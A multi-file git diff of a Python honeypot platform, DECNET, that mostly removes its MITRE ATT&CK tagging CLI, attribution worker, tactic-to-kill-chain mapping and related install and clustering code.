return f"skip: {path} already present" if existed else "ok"
|
||||
|
||||
|
||||
def _ensure_config(
|
||||
path: Path, group: str, *, user: str, dry_run: bool,
|
||||
) -> str:
|
||||
def _ensure_config(path: Path, group: str, *, dry_run: bool) -> str:
|
||||
if path.exists():
|
||||
return f"skip: {path} already present"
|
||||
if dry_run:
|
||||
console.print(f" [dim]would write:[/] {path}")
|
||||
return "ok"
|
||||
path.parent.mkdir(parents=True, exist_ok=True)
|
||||
rendered = _CONFIG_PLACEHOLDER.format(api_user=user, api_group=group)
|
||||
path.write_text(rendered)
|
||||
path.write_text(_CONFIG_PLACEHOLDER)
|
||||
try:
|
||||
os.chmod(path, 0o640)
|
||||
gid = grp.getgrnam(group).gr_gid
|
||||
@@ -611,7 +601,7 @@ def register(app: typer.Typer) -> None:
|
||||
# (Path("/"). / "/opt/decnet" == Path("/opt/decnet"), dropping pfx).
|
||||
_install_rel = install_dir.lstrip("/")
|
||||
|
||||
required_tools: tuple[str, ...] = ("systemctl",) if deinit else (
|
||||
required_tools = ("systemctl",) if deinit else (
|
||||
"systemctl", "useradd", "groupadd", "systemd-tmpfiles",
|
||||
)
|
||||
if deinit:
|
||||
@@ -668,7 +658,7 @@ def register(app: typer.Typer) -> None:
|
||||
)
|
||||
_step(
|
||||
"systemctl daemon-reload",
|
||||
lambda: (_run(["systemctl", "daemon-reload"], dry_run=dry_run), "ok")[1], # type: ignore[func-returns-value]
|
||||
lambda: (_run(["systemctl", "daemon-reload"], dry_run=dry_run), "ok")[1],
|
||||
)
|
||||
_step(
|
||||
f"remove {etc_decnet / 'decnet.ini'}",
|
||||
@@ -764,13 +754,6 @@ def register(app: typer.Typer) -> None:
|
||||
(pfx / _install_rel, 0o755, user, group),
|
||||
(pfx / "var/lib/decnet", 0o750, user, group),
|
||||
(pfx / "var/lib/decnet/geoip", 0o755, user, group),
|
||||
# DEBT-035 / DEBT-047: artifact root carries setgid (the
|
||||
# 0o2... bit) so every file written under it inherits the
|
||||
# decnet group regardless of which container's uid created
|
||||
# it. Group-write (0o2775) lets the API process and the
|
||||
# local TTP worker read each other's outputs without a
|
||||
# manual chown after every fresh deploy.
|
||||
(pfx / "var/lib/decnet/artifacts", 0o2775, user, group),
|
||||
(pfx / "var/log/decnet", 0o750, user, group),
|
||||
(etc_decnet, 0o755, "root", group),
|
||||
(pfx / "run/decnet", 0o755, "root", group),
|
||||
@@ -792,15 +775,12 @@ def register(app: typer.Typer) -> None:
|
||||
for path, mode, d_owner, d_group in dirs:
|
||||
_step(
|
||||
f"ensure dir {path}",
|
||||
lambda p=path, m=mode, o=d_owner, g=d_group: # type: ignore[misc]
|
||||
lambda p=path, m=mode, o=d_owner, g=d_group:
|
||||
_ensure_dir(p, mode=m, owner=o, group=g, dry_run=dry_run),
|
||||
)
|
||||
_step(
|
||||
f"write {etc_decnet / 'decnet.ini'}",
|
||||
lambda: _ensure_config(
|
||||
etc_decnet / "decnet.ini", group,
|
||||
user=user, dry_run=dry_run,
|
||||
),
|
||||
lambda: _ensure_config(etc_decnet / "decnet.ini", group, dry_run=dry_run),
|
||||
)
|
||||
_step(
|
||||
"install systemd units",
|
||||
@@ -832,7 +812,7 @@ def register(app: typer.Typer) -> None:
|
||||
)
|
||||
_step(
|
||||
"systemctl daemon-reload",
|
||||
lambda: (_run(["systemctl", "daemon-reload"], dry_run=dry_run), "ok")[1], # type: ignore[func-returns-value]
|
||||
lambda: (_run(["systemctl", "daemon-reload"], dry_run=dry_run), "ok")[1],
|
||||
)
|
||||
|
||||
if no_start:
|
||||
@@ -843,7 +823,7 @@ def register(app: typer.Typer) -> None:
|
||||
_step(
|
||||
"systemctl enable --now decnet.target",
|
||||
lambda: (
|
||||
_run( # type: ignore[func-returns-value]
|
||||
_run(
|
||||
["systemctl", "enable", "--now", "decnet.target"],
|
||||
dry_run=dry_run,
|
||||
),
|
||||
|
||||
@@ -16,16 +16,8 @@ from .utils import console, log
|
||||
def register(app: typer.Typer) -> None:
|
||||
@app.command()
|
||||
def swarmctl(
|
||||
port: int = typer.Option(
|
||||
8770, "--port",
|
||||
envvar="DECNET_SWARMCTL_PORT",
|
||||
help="Port for the swarm controller. Defaults to [swarm] swarmctl-port from /etc/decnet/decnet.ini, else 8770.",
|
||||
),
|
||||
host: str = typer.Option(
|
||||
"127.0.0.1", "--host",
|
||||
envvar="DECNET_SWARMCTL_HOST",
|
||||
help="Bind address for the swarm controller. Defaults to [swarm] swarmctl-host from /etc/decnet/decnet.ini, else 127.0.0.1.",
|
||||
),
|
||||
port: int = typer.Option(8770, "--port", help="Port for the swarm controller"),
|
||||
host: str = typer.Option("127.0.0.1", "--host", help="Bind address for the swarm controller"),
|
||||
daemon: bool = typer.Option(False, "--daemon", "-d", help="Detach to background as a daemon process"),
|
||||
no_listener: bool = typer.Option(False, "--no-listener", help="Do not auto-spawn the syslog-TLS listener alongside swarmctl"),
|
||||
tls: bool = typer.Option(False, "--tls", help="Serve over HTTPS with mTLS (required for cross-host worker heartbeats)"),
|
||||
|
||||
@@ -233,8 +233,8 @@ def _delete(
|
||||
topo = await repo.get_topology(topology_id)
|
||||
if topo is None:
|
||||
return False, "not-found"
|
||||
if topo.status in _RUNNING:
|
||||
return False, str(topo.status)
|
||||
if topo["status"] in _RUNNING:
|
||||
return False, str(topo["status"])
|
||||
ok = await repo.delete_topology_cascade(topology_id)
|
||||
return ok, None
|
||||
|
||||
|
||||
@@ -1,309 +0,0 @@
|
||||
"""``decnet ttp`` — TTP-tagging worker and admin commands.
|
||||
|
||||
Two flat commands share this module:
|
||||
|
||||
* ``decnet ttp`` — runs the long-running tagger worker. Bus-woken on
|
||||
``attacker.session.ended`` / ``attacker.observed`` /
|
||||
``attacker.intel.enriched`` / ``identity.{formed,merged}`` /
|
||||
``credential.reuse.detected`` / ``email.received`` / ``canary.>``;
|
||||
dispatches each event through :class:`CompositeTagger` (RuleEngine +
|
||||
Behavioral / Intel / CanaryFingerprint / Email / Identity / Credential
|
||||
lifters), persists ``ttp_tag`` rows via the idempotent
|
||||
``INSERT OR IGNORE`` write, and publishes ``ttp.tagged`` +
|
||||
``ttp.rule.fired.<technique_id>`` only when the insert returned a
|
||||
non-zero rowcount (loop-prevention invariant from TTP_TAGGING.md
|
||||
§"Bus topics"). Invoked by the ``decnet-ttp.service`` systemd unit
|
||||
so its argv must stay stable.
|
||||
|
||||
* ``decnet ttp-backfill`` — replays historical events (shell commands
|
||||
recorded on :class:`Attacker.commands`, :class:`CanaryTrigger` rows)
|
||||
through the live tagger. Writes ``ttp_tag`` rows using the same
|
||||
idempotent insert path. **Does not publish** to the bus — replay must
|
||||
not re-trigger SIEM/webhook fan-out on already-attributed events.
|
||||
|
||||
Both are master-only — gated via ``MASTER_ONLY_COMMANDS`` in
|
||||
:mod:`decnet.cli.gating`.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import asyncio
|
||||
import time
|
||||
from datetime import datetime, timedelta, timezone
|
||||
from typing import Any
|
||||
|
||||
import typer
|
||||
|
||||
from decnet.ttp.factory import CompositeTagger, get_tagger
|
||||
|
||||
from . import utils as _utils
|
||||
from .utils import console, log
|
||||
|
||||
|
||||
_BACKFILL_SOURCES = ("command", "canary", "all")
|
||||
|
||||
|
||||
def register(app: typer.Typer) -> None:
|
||||
@app.command(name="ttp")
|
||||
def ttp(
|
||||
poll_interval_secs: float = typer.Option(
|
||||
60.0, "--poll-interval", "-i",
|
||||
help="Slow-tick fallback when the bus is idle or unavailable (seconds)",
|
||||
),
|
||||
daemon: bool = typer.Option(
|
||||
False, "--daemon", "-d",
|
||||
help="Detach to background as a daemon process",
|
||||
),
|
||||
) -> None:
|
||||
"""TTP-tagging worker — MITRE ATT&CK technique tagging."""
|
||||
from decnet.ttp.worker import run_ttp_worker_loop
|
||||
from decnet.web.dependencies import repo
|
||||
|
||||
if daemon:
|
||||
log.info("ttp daemonizing poll=%s", poll_interval_secs)
|
||||
_utils._daemonize()
|
||||
|
||||
log.info("ttp command invoked poll=%s", poll_interval_secs)
|
||||
console.print(
|
||||
f"[bold cyan]TTP tagging worker starting[/] "
|
||||
f"poll={poll_interval_secs}s"
|
||||
)
|
||||
console.print("[dim]Press Ctrl+C to stop[/]")
|
||||
|
||||
async def _run() -> None:
|
||||
await repo.initialize()
|
||||
await run_ttp_worker_loop(
|
||||
repo, poll_interval_secs=poll_interval_secs,
|
||||
)
|
||||
|
||||
try:
|
||||
asyncio.run(_run())
|
||||
except KeyboardInterrupt:
|
||||
console.print("\n[yellow]TTP tagging worker stopped.[/]")
|
||||
|
||||
@app.command(name="ttp-backfill")
|
||||
def ttp_backfill(
|
||||
since_days: int = typer.Option(
|
||||
7, "--since-days", "-s",
|
||||
min=1, max=3650,
|
||||
help="Replay events whose source row is newer than N days ago.",
|
||||
),
|
||||
source: str = typer.Option(
|
||||
"all", "--source",
|
||||
help=f"Source slice to replay. One of: {', '.join(_BACKFILL_SOURCES)}.",
|
||||
),
|
||||
dry_run: bool = typer.Option(
|
||||
False, "--dry-run",
|
||||
help="Run the tagger but skip insert_tags. Reports counts only.",
|
||||
),
|
||||
batch_size: int = typer.Option(
|
||||
500, "--batch-size",
|
||||
min=1, max=100_000,
|
||||
help="Number of tags accumulated before each repo.insert_tags call.",
|
||||
),
|
||||
) -> None:
|
||||
"""Replay historical attacker activity through the live tagger.
|
||||
|
||||
Walks ``Attacker.commands`` (per-IP shell-command history) and
|
||||
``CanaryTrigger`` (canary callback log) since N days ago,
|
||||
builds the same :class:`TaggerEvent` shape the live worker
|
||||
emits, and persists tags via the idempotent INSERT OR IGNORE
|
||||
write. Re-running is safe — a second pass over identical
|
||||
source rows reports ``inserted=0``.
|
||||
|
||||
Bus publish is intentionally suppressed; SIEM / webhook fan-out
|
||||
sees only live events, never replays.
|
||||
"""
|
||||
from decnet.cli.gating import _require_master_mode
|
||||
from decnet.web.dependencies import repo
|
||||
|
||||
_require_master_mode("ttp-backfill")
|
||||
|
||||
if source not in _BACKFILL_SOURCES:
|
||||
console.print(
|
||||
f"[red]invalid --source {source!r}; expected one of "
|
||||
f"{_BACKFILL_SOURCES}[/]"
|
||||
)
|
||||
raise typer.Exit(code=2)
|
||||
|
||||
cutoff = datetime.now(tz=timezone.utc) - timedelta(days=since_days)
|
||||
console.print(
|
||||
f"[bold cyan]TTP backfill[/] since={cutoff.isoformat()} "
|
||||
f"source={source} dry_run={dry_run} batch_size={batch_size}"
|
||||
)
|
||||
|
||||
async def _run() -> None:
|
||||
await repo.initialize()
|
||||
await _backfill(
|
||||
repo,
|
||||
cutoff=cutoff,
|
||||
sources=_resolve_sources(source),
|
||||
dry_run=dry_run,
|
||||
batch_size=batch_size,
|
||||
)
|
||||
|
||||
try:
|
||||
asyncio.run(_run())
|
||||
except KeyboardInterrupt:
|
||||
console.print("\n[yellow]Backfill interrupted.[/]")
|
||||
|
||||
|
||||
def _resolve_sources(name: str) -> tuple[str, ...]:
|
||||
if name == "all":
|
||||
return ("command", "canary")
|
||||
return (name,)
|
||||
|
||||
|
||||
async def _backfill(
|
||||
repo: Any,
|
||||
*,
|
||||
cutoff: datetime,
|
||||
sources: tuple[str, ...],
|
||||
dry_run: bool,
|
||||
batch_size: int,
|
||||
) -> None:
|
||||
"""Drive the per-source backfill loops and report structured counts.
|
||||
|
||||
One :class:`CompositeTagger` is built once and reused for every
|
||||
source — the per-lifter watch fan-out the live worker performs is
|
||||
inlined here as a `watch_store()` startup task per
|
||||
:class:`WatchableTagger`, so the dispatch indexes hydrate before
|
||||
we start feeding events.
|
||||
"""
|
||||
# Import-time bound so tests can monkeypatch ``decnet.cli.ttp.get_tagger``
|
||||
# to inject a recording fake without touching the global factory.
|
||||
tagger = get_tagger()
|
||||
watch_tasks: list[asyncio.Task[None]] = []
|
||||
if isinstance(tagger, CompositeTagger):
|
||||
for watchable in tagger.iter_watchables():
|
||||
watch_tasks.append(asyncio.create_task(watchable.watch_store()))
|
||||
# Yield once so each watch_store gets a chance to run its
|
||||
# initial `load_compiled` before we feed the first event.
|
||||
await asyncio.sleep(0.05)
|
||||
|
||||
try:
|
||||
if "command" in sources:
|
||||
await _backfill_commands(
|
||||
repo, tagger, cutoff=cutoff,
|
||||
dry_run=dry_run, batch_size=batch_size,
|
||||
)
|
||||
if "canary" in sources:
|
||||
await _backfill_canaries(
|
||||
repo, tagger, cutoff=cutoff,
|
||||
dry_run=dry_run, batch_size=batch_size,
|
||||
)
|
||||
finally:
|
||||
for task in watch_tasks:
|
||||
task.cancel()
|
||||
for task in watch_tasks:
|
||||
try:
|
||||
await task
|
||||
except (asyncio.CancelledError, Exception): # noqa: BLE001
|
||||
pass
|
||||
|
||||
|
||||
async def _backfill_commands(
|
||||
repo: Any,
|
||||
tagger: Any,
|
||||
*,
|
||||
cutoff: datetime,
|
||||
dry_run: bool,
|
||||
batch_size: int,
|
||||
) -> None:
|
||||
from decnet.ttp.base import TaggerEvent
|
||||
|
||||
started = time.monotonic()
|
||||
rows_seen = 0
|
||||
cmds_seen = 0
|
||||
inserted = 0
|
||||
pending: list[Any] = []
|
||||
|
||||
async for attacker, commands in repo.iter_attacker_commands_since(cutoff):
|
||||
rows_seen += 1
|
||||
for idx, cmd in enumerate(commands):
|
||||
cmds_seen += 1
|
||||
text = cmd.get("command_text") or cmd.get("text")
|
||||
if not isinstance(text, str):
|
||||
continue
|
||||
cmd_id = (
|
||||
cmd.get("id")
|
||||
or cmd.get("uuid")
|
||||
or cmd.get("command_id")
|
||||
or f"{attacker.uuid}#cmd{idx}"
|
||||
)
|
||||
event = TaggerEvent(
|
||||
source_kind="command",
|
||||
source_id=str(cmd_id),
|
||||
attacker_uuid=attacker.uuid,
|
||||
identity_uuid=getattr(attacker, "identity_id", None),
|
||||
session_id=cmd.get("session_id"),
|
||||
decky_id=cmd.get("decky_id") or cmd.get("decky"),
|
||||
payload={**cmd, "command_text": text},
|
||||
)
|
||||
tags = await tagger.tag(event)
|
||||
if tags:
|
||||
pending.extend(tags)
|
||||
if len(pending) >= batch_size:
|
||||
inserted += await _flush(repo, pending, dry_run)
|
||||
pending = []
|
||||
if pending:
|
||||
inserted += await _flush(repo, pending, dry_run)
|
||||
elapsed = time.monotonic() - started
|
||||
console.print(
|
||||
f"source=command rows={rows_seen} commands={cmds_seen} "
|
||||
f"inserted={inserted} dry_run={dry_run} elapsed_s={elapsed:.2f}"
|
||||
)
|
||||
|
||||
|
||||
async def _backfill_canaries(
|
||||
repo: Any,
|
||||
tagger: Any,
|
||||
*,
|
||||
cutoff: datetime,
|
||||
dry_run: bool,
|
||||
batch_size: int,
|
||||
) -> None:
|
||||
from decnet.ttp.base import TaggerEvent
|
||||
|
||||
started = time.monotonic()
|
||||
rows_seen = 0
|
||||
inserted = 0
|
||||
pending: list[Any] = []
|
||||
|
||||
async for trigger in repo.iter_canary_triggers_since(cutoff):
|
||||
rows_seen += 1
|
||||
event = TaggerEvent(
|
||||
source_kind="canary_fingerprint",
|
||||
source_id=trigger.uuid,
|
||||
attacker_uuid=trigger.attacker_id,
|
||||
identity_uuid=None,
|
||||
session_id=None,
|
||||
decky_id=None,
|
||||
payload={
|
||||
"token_uuid": trigger.token_uuid,
|
||||
"src_ip": trigger.src_ip,
|
||||
"ua_signature": trigger.user_agent or "",
|
||||
"user_agent": trigger.user_agent,
|
||||
"request_path": trigger.request_path,
|
||||
"dns_qname": trigger.dns_qname,
|
||||
"headers": trigger.headers(),
|
||||
},
|
||||
)
|
||||
tags = await tagger.tag(event)
|
||||
if tags:
|
||||
pending.extend(tags)
|
||||
if len(pending) >= batch_size:
|
||||
inserted += await _flush(repo, pending, dry_run)
|
||||
pending = []
|
||||
if pending:
|
||||
inserted += await _flush(repo, pending, dry_run)
|
||||
elapsed = time.monotonic() - started
|
||||
console.print(
|
||||
f"source=canary rows={rows_seen} inserted={inserted} "
|
||||
f"dry_run={dry_run} elapsed_s={elapsed:.2f}"
|
||||
)
|
||||
|
||||
|
||||
async def _flush(repo: Any, tags: list[Any], dry_run: bool) -> int:
|
||||
if dry_run:
|
||||
return 0
|
||||
return int(await repo.insert_tags(tags))
|
||||
@@ -11,7 +11,7 @@ import signal
|
||||
import subprocess # nosec B404
|
||||
import sys
|
||||
from pathlib import Path
|
||||
from typing import Any, Callable, Optional
|
||||
from typing import Optional
|
||||
|
||||
import typer
|
||||
from rich.console import Console
|
||||
@@ -96,7 +96,7 @@ def _is_running(match_fn) -> int | None:
|
||||
return None
|
||||
|
||||
|
||||
def _service_registry(log_file: str) -> list[tuple[str, Callable[..., Any], list[str]]]:
|
||||
def _service_registry(log_file: str) -> list[tuple[str, callable, list[str]]]:
|
||||
"""Return the microservice registry for health-check and relaunch.
|
||||
|
||||
On agents these run as systemd units invoking /usr/local/bin/decnet,
|
||||
@@ -195,7 +195,7 @@ _DEFAULT_SWARMCTL_URL = "http://127.0.0.1:8770"
|
||||
|
||||
|
||||
def _swarmctl_base_url(url: Optional[str]) -> str:
|
||||
return url or os.environ.get("DECNET_SWARMCTL_URL") or _DEFAULT_SWARMCTL_URL
|
||||
return url or os.environ.get("DECNET_SWARMCTL_URL", _DEFAULT_SWARMCTL_URL)
|
||||
|
||||
|
||||
def _http_request(method: str, url: str, *, json_body: Optional[dict] = None, timeout: float = 30.0):
|
||||
|
||||
@@ -192,70 +192,6 @@ def register(app: typer.Typer) -> None:
|
||||
except KeyboardInterrupt:
|
||||
console.print("\n[yellow]Reuse correlator stopped.[/]")
|
||||
|
||||
@app.command(name="attribution")
|
||||
def attribution(
|
||||
multi_actor_tick_secs: float = typer.Option(
|
||||
60.0, "--multi-actor-tick", "-t",
|
||||
help=(
|
||||
"Cross-primitive multi_actor correlator tick interval (seconds). "
|
||||
"Walks attribution_state for identities flagged on >= 2 "
|
||||
"primitives and emits attribution.profile.multi_actor_suspected."
|
||||
),
|
||||
),
|
||||
daemon: bool = typer.Option(
|
||||
False, "--daemon", "-d",
|
||||
help="Detach to background as a daemon process",
|
||||
),
|
||||
) -> None:
|
||||
"""Attribution engine v0 — per-(identity, primitive) state machine.
|
||||
|
||||
Subscribes to ``attacker.observation.>`` and, for each event,
|
||||
ensures a stub identity row, runs the merger over the full
|
||||
per-(identity, primitive) observation series, upserts the
|
||||
derived state, and publishes
|
||||
``attribution.profile.state_changed`` only on transition.
|
||||
Periodic tick fires
|
||||
``attribution.profile.multi_actor_suspected`` when >= 2
|
||||
primitives flag the same identity.
|
||||
|
||||
Closes DEBT-051. Bright-line scope: behavioural coherence and
|
||||
drift only — never persona attribution to natural persons.
|
||||
"""
|
||||
import asyncio
|
||||
from decnet.correlation.attribution_worker import (
|
||||
run_attribution_loop,
|
||||
)
|
||||
from decnet.web.dependencies import repo
|
||||
|
||||
if daemon:
|
||||
log.info(
|
||||
"attribution worker daemonizing tick=%s",
|
||||
multi_actor_tick_secs,
|
||||
)
|
||||
_utils._daemonize()
|
||||
|
||||
log.info(
|
||||
"attribution worker command invoked tick=%s",
|
||||
multi_actor_tick_secs,
|
||||
)
|
||||
console.print(
|
||||
f"[bold cyan]Attribution engine starting[/] "
|
||||
f"multi_actor_tick={multi_actor_tick_secs}s"
|
||||
)
|
||||
console.print("[dim]Press Ctrl+C to stop[/]")
|
||||
|
||||
async def _run() -> None:
|
||||
await repo.initialize()
|
||||
await run_attribution_loop(
|
||||
repo,
|
||||
multi_actor_tick_secs=multi_actor_tick_secs,
|
||||
)
|
||||
|
||||
try:
|
||||
asyncio.run(_run())
|
||||
except KeyboardInterrupt:
|
||||
console.print("\n[yellow]Attribution engine stopped.[/]")
|
||||
|
||||
@app.command(name="clusterer")
|
||||
def clusterer(
|
||||
poll_interval_secs: float = typer.Option(
|
||||
@@ -359,10 +295,3 @@ def register(app: typer.Typer) -> None:
|
||||
asyncio.run(_run())
|
||||
except KeyboardInterrupt:
|
||||
console.print("\n[yellow]Campaign clusterer stopped.[/]")
|
||||
|
||||
# ``decnet ttp`` and ``decnet ttp-backfill`` moved to
|
||||
# :mod:`decnet.cli.ttp` — the TTP CLI surface (worker + admin verbs)
|
||||
# is colocated there, mirroring the per-feature CLI split used by
|
||||
# :mod:`decnet.cli.canary`, :mod:`decnet.cli.webhook`, etc. The
|
||||
# ``decnet-ttp.service`` systemd unit's ExecStart still resolves to
|
||||
# ``decnet ttp`` because the command name is unchanged.
|
||||
|
||||
@@ -66,10 +66,7 @@ def cluster_identities(
|
||||
return {f.identity_uuid: f"cmp-{find(f.identity_uuid)}" for f in feat_list}
|
||||
|
||||
|
||||
def from_identity_row(
|
||||
row: dict[str, Any],
|
||||
ttp_decky_phases: list[dict[str, Any]] | None = None,
|
||||
) -> IdentityFeatures:
|
||||
def from_identity_row(row: dict[str, Any]) -> IdentityFeatures:
|
||||
"""Project an ``AttackerIdentity`` projection row dict into an
|
||||
:class:`IdentityFeatures`.
|
||||
|
||||
@@ -78,59 +75,20 @@ def from_identity_row(
|
||||
ja3_hashes / hassh_hashes / payload_simhashes / c2_endpoints
|
||||
(JSON list[str] or null).
|
||||
|
||||
*ttp_decky_phases* is the optional per-identity payload from
|
||||
:meth:`BaseRepository.list_ttp_decky_phases` — one row per
|
||||
``ttp_tag`` carrying ``(decky_id, tactic, created_at_ts)``. When
|
||||
provided, the adapter projects ``tactic`` → :class:`UKCPhase` and
|
||||
populates :attr:`IdentityFeatures.first_phase_per_decky` /
|
||||
``last_phase_per_decky`` / ``first_seen_per_decky`` /
|
||||
``last_seen_per_decky` so the production phase-handoff edge
|
||||
finally fires. The synthetic fixture path
|
||||
(:func:`from_synthetic_identity`) is unchanged — fixtures keep
|
||||
emitting UKC directly.
|
||||
Phase-handoff fields stay empty until the production-row adapter
|
||||
learns to mine logs for per-decky phase sequences (TODO.md
|
||||
"production-side payload + C2 + commands joins"). Without those,
|
||||
the campaign clusterer falls back to shared-infra + temporal
|
||||
overlap + cohort signals on production data; the fixture path
|
||||
exercises the full feature set via :func:`from_synthetic_identity`.
|
||||
"""
|
||||
from decnet.clustering.ukc import tactic_to_ukc_phase # noqa: PLC0415
|
||||
|
||||
payload_hashes = _parse_json_list(row.get("payload_simhashes"))
|
||||
c2_endpoints = _parse_json_list(row.get("c2_endpoints"))
|
||||
|
||||
first_phase_per_decky: dict[str, str] = {}
|
||||
last_phase_per_decky: dict[str, str] = {}
|
||||
first_seen_per_decky: dict[str, float] = {}
|
||||
last_seen_per_decky: dict[str, float] = {}
|
||||
decky_set: set[str] = set()
|
||||
|
||||
# Rows arrive ordered by ``created_at``; ``setdefault`` preserves
|
||||
# the FIRST observation per decky, plain assignment captures the
|
||||
# LAST. Tags whose tactic is outside the ATT&CK→UKC map (or whose
|
||||
# phase is pre-target / unobservable) are dropped — they should
|
||||
# not be assigned by any rule per TTP_TAGGING.md §UKC bridge.
|
||||
for entry in ttp_decky_phases or []:
|
||||
decky = entry.get("decky_id")
|
||||
tactic = entry.get("tactic")
|
||||
created_at_ts = entry.get("created_at_ts")
|
||||
if not isinstance(decky, str) or not isinstance(tactic, str):
|
||||
continue
|
||||
phase = tactic_to_ukc_phase(tactic)
|
||||
if phase is None:
|
||||
continue
|
||||
ts = float(created_at_ts) if isinstance(
|
||||
created_at_ts, (int, float)) else 0.0
|
||||
decky_set.add(decky)
|
||||
first_phase_per_decky.setdefault(decky, phase.value)
|
||||
last_phase_per_decky[decky] = phase.value
|
||||
first_seen_per_decky.setdefault(decky, ts)
|
||||
last_seen_per_decky[decky] = ts
|
||||
|
||||
return IdentityFeatures(
|
||||
identity_uuid=row["uuid"],
|
||||
payload_hashes=frozenset(payload_hashes),
|
||||
c2_endpoints=frozenset(c2_endpoints),
|
||||
decky_set=frozenset(decky_set),
|
||||
first_phase_per_decky=first_phase_per_decky,
|
||||
last_phase_per_decky=last_phase_per_decky,
|
||||
first_seen_per_decky=first_seen_per_decky,
|
||||
last_seen_per_decky=last_seen_per_decky,
|
||||
)
|
||||
|
||||
|
||||
@@ -174,26 +132,8 @@ class ConnectedComponentsCampaignClusterer(CampaignClusterer):
|
||||
# merged out — their winner is the active row and gets clustered
|
||||
# on its own. This keeps the campaign graph from double-counting.
|
||||
active_rows = [r for r in rows if not r.get("merged_into_uuid")]
|
||||
# Pull TTP-derived per-decky phase observations per identity
|
||||
# (E.3.15). Failures here are non-fatal — the clusterer falls
|
||||
# back to the empty phase-handoff signal, same as the legacy
|
||||
# behavior, so a partial repo doesn't take the worker down.
|
||||
decky_phases_by_identity: dict[str, list[dict[str, Any]]] = {}
|
||||
for r in active_rows:
|
||||
try:
|
||||
decky_phases_by_identity[r["uuid"]] = (
|
||||
await repo.list_ttp_decky_phases(r["uuid"])
|
||||
)
|
||||
except Exception: # noqa: BLE001
|
||||
log.warning(
|
||||
"campaign clusterer: list_ttp_decky_phases failed "
|
||||
"for identity %s; phase-handoff edge inert",
|
||||
r["uuid"],
|
||||
)
|
||||
decky_phases_by_identity[r["uuid"]] = []
|
||||
feature_list: list[IdentityFeatures] = [
|
||||
from_identity_row(r, decky_phases_by_identity.get(r["uuid"]))
|
||||
for r in active_rows
|
||||
from_identity_row(r) for r in active_rows
|
||||
]
|
||||
row_by_uuid: dict[str, dict[str, Any]] = {
|
||||
r["uuid"]: r for r in active_rows
|
||||
|
||||
@@ -342,7 +342,7 @@ def combined_campaign_weight(
|
||||
# ─── Adapter for synthetic-fixture tests ────────────────────────────────────
|
||||
|
||||
|
||||
def from_synthetic_identity(att, identity_uuid: Optional[str] = None) -> IdentityFeatures:
|
||||
def from_synthetic_identity(att, identity_uuid: Optional[str] = None) -> IdentityFeatures: # type: ignore[no-untyped-def]
|
||||
"""Build an :class:`IdentityFeatures` from a ``SyntheticAttacker``.
|
||||
|
||||
Treats one ``SyntheticAttacker`` as one identity — adequate for
|
||||
|
||||
@@ -105,11 +105,11 @@ async def run_campaign_clusterer_loop(
|
||||
t.cancel()
|
||||
if heartbeat_task is not None:
|
||||
heartbeat_task.cancel()
|
||||
for task in (*wake_tasks, heartbeat_task):
|
||||
if task is None:
|
||||
for t in (*wake_tasks, heartbeat_task):
|
||||
if t is None:
|
||||
continue
|
||||
with contextlib.suppress(asyncio.CancelledError, Exception):
|
||||
await task
|
||||
await t
|
||||
if bus is not None:
|
||||
with contextlib.suppress(Exception):
|
||||
await bus.close()
|
||||
|
||||
@@ -363,9 +363,8 @@ async def _roll_up_fingerprints(
|
||||
breaks the clusterer tick — the columns just stay stale until the
|
||||
next pass."""
|
||||
summaries = extract_fp_summaries(member_rows)
|
||||
fp_kwargs = {k: v for k, v in summaries.items() if k in {"ja3_hashes", "hassh_hashes", "tls_cert_sha256"}}
|
||||
try:
|
||||
await repo.update_identity_fingerprints(identity_uuid, **fp_kwargs)
|
||||
await repo.update_identity_fingerprints(identity_uuid, **summaries)
|
||||
except Exception: # noqa: BLE001
|
||||
log.exception(
|
||||
"clusterer: failed to roll up fingerprints for identity=%s",
|
||||
|
||||
@@ -265,7 +265,7 @@ def combined_edge_weight(a: Observation, b: Observation) -> float:
|
||||
# ─── Adapter for the synthetic-corpus tests ─────────────────────────────────
|
||||
|
||||
|
||||
def from_synthetic(att) -> Observation:
|
||||
def from_synthetic(att) -> Observation: # type: ignore[no-untyped-def]
|
||||
"""Build an :class:`Observation` from a ``SyntheticAttacker``.
|
||||
|
||||
Lives here so test code doesn't import the factory shape into the
|
||||
|
||||
@@ -15,7 +15,6 @@ emits no events for unobservable phases.
|
||||
from __future__ import annotations
|
||||
|
||||
from enum import Enum
|
||||
from typing import Final
|
||||
|
||||
|
||||
class UKCPhase(str, Enum):
|
||||
@@ -107,96 +106,3 @@ def stage_of(phase: UKCPhase) -> str:
|
||||
if phase in STAGE_THROUGH:
|
||||
return "through"
|
||||
return "out"
|
||||
|
||||
|
||||
# MITRE ATT&CK tactic ID -> UKC phase. Covers the 14 enterprise tactics
|
||||
# plus the four ICS tactics referenced by Appendix A.7 (Conpot, MQTT).
|
||||
# Adding additional ICS tactics is a one-line addition. See
|
||||
# TTP_TAGGING.md "UKC bridge".
|
||||
ATTACK_TACTIC_TO_UKC: dict[str, UKCPhase] = {
|
||||
# Enterprise
|
||||
"TA0043": UKCPhase.RECONNAISSANCE, # Reconnaissance
|
||||
"TA0042": UKCPhase.RESOURCE_DEVELOPMENT, # Resource Development
|
||||
"TA0001": UKCPhase.DELIVERY, # Initial Access
|
||||
"TA0002": UKCPhase.EXECUTION, # Execution
|
||||
"TA0003": UKCPhase.PERSISTENCE, # Persistence
|
||||
"TA0004": UKCPhase.PRIVILEGE_ESCALATION, # Privilege Escalation
|
||||
"TA0005": UKCPhase.DEFENSE_EVASION, # Defense Evasion
|
||||
"TA0006": UKCPhase.CREDENTIAL_ACCESS, # Credential Access
|
||||
"TA0007": UKCPhase.DISCOVERY, # Discovery
|
||||
"TA0008": UKCPhase.LATERAL_MOVEMENT, # Lateral Movement
|
||||
"TA0009": UKCPhase.COLLECTION, # Collection
|
||||
"TA0011": UKCPhase.COMMAND_AND_CONTROL, # Command and Control
|
||||
"TA0010": UKCPhase.EXFILTRATION, # Exfiltration
|
||||
"TA0040": UKCPhase.IMPACT, # Impact
|
||||
# ICS — first-class projection so MQTT / Conpot / Modbus tags
|
||||
# don't drop out of campaign rollups when the clusterer projects
|
||||
# tactic to phase. ICS uses an independent tactic-ID range.
|
||||
"TA0100": UKCPhase.COLLECTION, # ICS: Collection
|
||||
"TA0102": UKCPhase.DISCOVERY, # ICS: Discovery
|
||||
"TA0105": UKCPhase.IMPACT, # ICS: Impact
|
||||
"TA0106": UKCPhase.IMPACT, # ICS: Impair Process Control
|
||||
}
|
||||
|
||||
|
||||
# ICS tactics live in a separate STIX bundle (mitre/ics-attack) that
|
||||
# DECNET does not currently load. They're exempt from the
|
||||
